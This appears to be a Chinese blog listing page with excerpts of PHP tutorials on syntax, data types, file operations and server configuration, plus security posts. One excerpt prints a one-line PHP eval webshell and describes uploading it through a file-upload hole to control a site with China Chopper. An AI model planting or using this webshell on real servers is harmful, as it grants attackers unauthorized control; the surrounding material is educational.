PHP
IT—INTEREST_挪吒
那一年,他离开女儿国。她在城头似哭似笑,当着百官的面,对着他的背影大喊“唐玄奘,下辈子娶我可好?”
展开
-
Web安全:一句话木马
概述在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?>【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括原创 2020-09-11 00:10:57 · 4941 阅读 · 0 评论 -
PHP——详细讲解:1、是什么2、做什么3、基本语法机构介绍
这一次,我们将详细解释PHP是什么?可以用来做什么?以及基本语法结构介绍!PHP是目前使用最广泛的编程语言之一。PHP 对于初学者也很容易学习。对于那些想要从事网络行业学习编程和那些考虑职业发展的人来说,这是一门值得学习的语言。一、什么是PHP?首先,PHP是什么样的语言?要了解PHP,最好参考PHP的官方网站php.net或者php中文网php.cn。我们来详细看看。...原创 2020-04-02 16:29:59 · 399 阅读 · 1 评论 -
PHP反序列化漏洞——漏洞原理及防御措施
序列化 将对象转换成字符串 反序列化 将特定格式的字符串转换成对象 什么是反序列化漏洞 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可...原创 2020-03-20 22:06:01 · 6852 阅读 · 2 评论 -
PHP——输出内容—三种方式
1.使用双引号中插入单引号。 echo "that's ok"; 2.使用单引号加上转义字符 \ 。 echo 'that\'s ok'; 3.使用eof输出一个h5文本。注意:?> echo <<<EOF <html> <body> tha...原创 2020-03-18 18:26:56 · 515 阅读 · 0 评论 -
PHP——PHP文件操作及命令执行—文件操作
查看当前所在目录 getcwd(); $pwd=getcwd(); echo $pwd; 查看当前目录下的文件 1.opendir(); $dir=opendir("$pwd"); while (($f=readdir($dir))!=false){ ...原创 2020-03-17 16:40:41 · 428 阅读 · 0 评论 -
PHP——PHP文件操作及命令执行—类与对象
类 : 定义了一件事物的抽象特点。类的定义包含了数据的形式以及对数据的操作。对象:是类的具体实际例子。 对象: 在面向对象的程序设计(英语:Object-oriented programming,缩写:OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。在现实世界里我们所面对的事情都是对象,如...原创 2020-03-17 16:02:06 · 233 阅读 · 0 评论 -
PHP——PHP文件操作及命令执行—运算符
什么是运算符: 1、在PHP中,大部分时间都是在操作数据。 2、运算符是用来处理这些数据的方式。 一、赋值运算符。 “=” 表示将右边的结果(可以是变量、数据、常量和其它运算出来的结果),保存到内存的某个位置,然后将位置的内存地址赋值给...原创 2020-03-17 12:34:12 · 253 阅读 · 0 评论 -
PHP——PHP文件操作及命令执行—PHP函数
一、自定义函数。 定义: 自定义函数通过将代码封装成组,让代码可以重复使用,使程序结构与逻辑关系更加清晰。同一个功能多次使用,使用函数来方便操作。 命名规则: 函数的命名不能和已有的函数名重复,且函数名只能由字母、数字、下划线组成,但是函数名不能用数字开头。 使用function()进行函数的创建: ...原创 2020-03-17 12:02:45 · 295 阅读 · 0 评论 -
PHP——PHP数据类型
date type,在php中指的是存储的数据本身的类型,而不是变量的类型,变量本身没有数据类型。一、PHP数据类型,分为三大类八小类。具体如下:1、基本数据类型: 整型:int/integer 系统分配4个字节存储,表示整数类型(有前提) 浮点型:float/double 系统分配8个字节存储,表示小数或整型存不下的...原创 2020-03-17 11:28:21 · 252 阅读 · 0 评论 -
PHP——PHP基础语法
一、什么是PHP。 PHP是嵌入html页面中的脚本语言。 目前最流行的网站开发语言。 在几乎所有的平台中都可以运行。 很多的企业都在使用PHP作为开发语言。 二、PHP的基础规范。 PHP 脚本以 <?php 开始,以 ?> 结束或者最后不加上?>。 php脚本可以单...原创 2020-03-17 10:55:58 · 172 阅读 · 0 评论 -
PHP——编写操作—在页面输出浏览器信息
目的:使用PHP编写页面内容显示出浏览器的信息。包括浏览器信息、系统信息、文件位置信息、PHP版本、文件内容行数。效果显示原创 2020-03-18 16:56:44 · 283 阅读 · 0 评论 -
PHP——配置环境—Apache服务器解析php文件
释:文件后缀解析是由 <apache服务器> 决定的 可以通过修改配置文件来实现 Apache配置文件路径:phpStudy\PHPTutorial\Apache\conf实验:完成apache服务器能够使用php解析.phtml .php3步骤如下: 第一步:首先看一下(Apache)后缀解析部分的配置文件的位置...原创 2020-03-18 16:54:59 · 2070 阅读 · 0 评论 -
PHP——配置环境—能够连接mongodb
步骤如下: 配置文件路径:php Study\PHPTutorial\php\php-5.4.45\php.ini 第一步:下载一个对应计算机php版本的php_mongodb.dll驱动程序, 将其放入在计算机 PHPstudy/PHPTutorial/php/php-5.6.27.nts/...原创 2020-03-18 16:50:10 · 272 阅读 · 0 评论